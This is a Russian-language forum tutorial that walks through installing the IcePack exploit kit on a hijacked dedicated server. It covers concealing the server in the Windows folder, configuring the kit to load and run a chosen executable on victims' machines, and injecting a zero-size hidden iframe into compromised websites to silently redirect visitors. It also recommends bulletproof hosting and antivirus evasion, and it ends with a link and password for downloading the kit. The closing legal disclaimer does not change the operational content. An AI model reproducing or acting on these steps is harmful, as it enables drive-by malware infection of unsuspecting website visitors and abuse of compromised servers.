Установка IcePacK на Дедике

Я долго думал , писать эту статью или нет , и вот всё таки решил написать лёгкую статейку по этой теме. Для начала скажу что опытные связководы эксплойтов ничего нового из этой статьи для себя не почерпнут , а новичками или просто людям которым это интересно думаю можно почитать

Что такое ICEPACK можно прочитать здесь .

Ну пожалуй начнём , и так допустим вы имеете дедик и желательно заброшенный , так же дедик должен иметь белый ip адрес , узнать это просто , заходим в Пуск=Выполнить-cmd.exe , далее в смd пишем:



Code:
ipconfig/all


вывод команды ipconfig должен быть таким :


Code:
C:\>ipconfig/allНастройка протокола IP для Windows Имя компьютера . . . . . . . . . : microsof-e82618 Основной DNS-суффикс . . . . . . : Тип узла. . . . . . . . . . . . . : неизвестный IP-маршрутизация включена . . . . : нет WINS-прокси включен . . . . . . . : нетПодключение по локальной сети - Ethernet адаптер: DNS-суффикс этого подключения . . : Описание . . . . . . . . . . . . : Realtek RTL8169/8110 Family GigabitEthernet NIC Физический адрес. . . . . . . . . : 00-16-17-D6-79-50 Dhcp включен. . . . . . . . . . . : да Автонастройка включена . . . . . : да IP-адрес . . . . . . . . . . . . : 61.201.88.188 Маска подсети . . . . . . . . . . : 255.255.255.0 Основной шлюз . . . . . . . . . . : 61.201.18.1 DHCP-сервер . . . . . . . . . . . : 152.16.18.1 DNS-серверы . . . . . . . . . . . : 61.201.18.1 Аренда получена . . . . . . . . . : 29 марта 2009 г. 0:57:33 Аренда истекает . . . . . . . . . : 29 марта 2009 г. 12:57:33C:\>

ip адрес закрашен и изменён , но думаю суть ясна.



Теперь нам будут нужны Apache+PHP+Mysql , для этого можно выбрать к примеру Vertrigo , он легок , просто в использовании и имеет всё что нам будет нужно для работы ,


Code:
Компоненты:
Apache 2.0.63
PHP 5.2.6
MySQL 5.0.51b
SQLite 3.5.9
Smarty 2.6.19
PhpMyAdmin 2.11.7
ZendOptimizer 3.3.3
SQLiteManager 1.2.0

и всё в одном флаконе, скачаем его от сюда.
Так же хочу отметить что Vertrigo очень просто в установке , устанавливается он двумя кликами .
После того как мы скачали и установили Vertrigo .. хочу заметить , что папку для установки лучше выбрать в директории C:\Windows ... чем не заметней ,тем лучше.
После того как мы всё это проделали , ищем в интернете IcePack Platinum Edition 2007 by IDT Group я специально не размещаю ссылку на него здесь так как IcePack является вредоносным ПО , распаковываем скаченный архив и копируем содержимое папки icepack в C:\Windows\VertrigoServ\www
Далее нам нужно создать базу данных для нашего айспака , для этого в браузере прописываем ip нашего дедики , например:


Code:
http://xx.xxx.xxx.xx/phpmyadmin

появится окно авторизации , по дефолту логин root пароль vertrigo , зайдя в PhpMyadmin создаём новую базу , назовём её ice.
так , база создана , идём в директорию с icepack в папку www и правим файл config.php со следующим содержанием

PHP код:


Code:
<?php

Code:
$config

= array (
'main_url' => "localhost",
'admin_name' => "root",
'admin_pass' => "vertrigo",
);
?>
так же правим файл db.php PHP код:


Code:

<?php define ("DBHOST", "localhost");
define ("DBNAME", "ice");
define ("DBUSER", "root");
define ("DBPASS", "vertrigo");
?>Кстати советую сменить дефолтный пароль vertrigo на свой ! Теперь всё готово и приступаем к установки IcePack , в браузере пишем http://xx.xxx.xxx.xx/install.php установка проста до безобразия всё готово , заходим в админку IcePack всё готово , заходим в админку IcePack Ну здесь всё тоже очень просто вкладка Main показывает общую конфигурацию. Statistics показывает Refferals=рефералы , Observers=анализаторы , Loadings=какие браузеры были пробиты , The countries=страны , Operational systems= какие были OS Work with FTP = позволяет работать с ftp аккаунтами , там тоже всё очень просто описывать не вижу смысла . Самая интересная вкладка Tools , The Traffic=позволяет выбирать страны для блокировки трафика , через Adjustments выбираем файл который будет загружаться и запускаться на компьютере жертвы. Как видите ничего сверхъестественного в настройке IcePack нет, в URL Script [] : прописываем ваш адрес http://xx.xxx.xx.xxx/ , в Name of the user [] : имя юзера админки , в The password of the user : пароль от админки , и File for loading [] : тут через обзор загружаем нужный нам файл и нажимаем Keep (cм скрин выше) Ну и самое пожалуй основное это Code iFrame для чего он нужен я объясню в кратции , допустим вы получили доступ к какому либо ресурсу (сайт , форум и тд ) и имеет права для редактирования файла index , в индекс вставляется , iFrame код , незаметно для пользователя идёт перенаправление на наш заражённый адрес (URL) , в следствии чего на компьютер жервы загружается и запускается наш ехе файл. Iframe код выглядет так :

Code:
<iframe src="заражённый url/index.php" width="0" height="0"></iframe>

От себя хочу сказать следующие , обычно такой софт как IcePack размещают на абузоустойчевых серверах и сам IcePack или другая связка эксплойтов не должна палиться антивирусами .
На этом думаю следует закончить , если у кого есть какие либо дополнения , милости прошу , а я наверное начинаю писать статью, как можно защититься этот такого вида угроз !
Данная статья написана с целью ознакомления и следует помнить что данные действия попадают под статьи УК.


© stopxakep


Несколько версии айпака: hXXp://www.sendspace.com/file/gt14rd
pass: csu

вместо Vertigo лучше использовать xampp portable - hXXp://portableapps.com/apps/development/xampp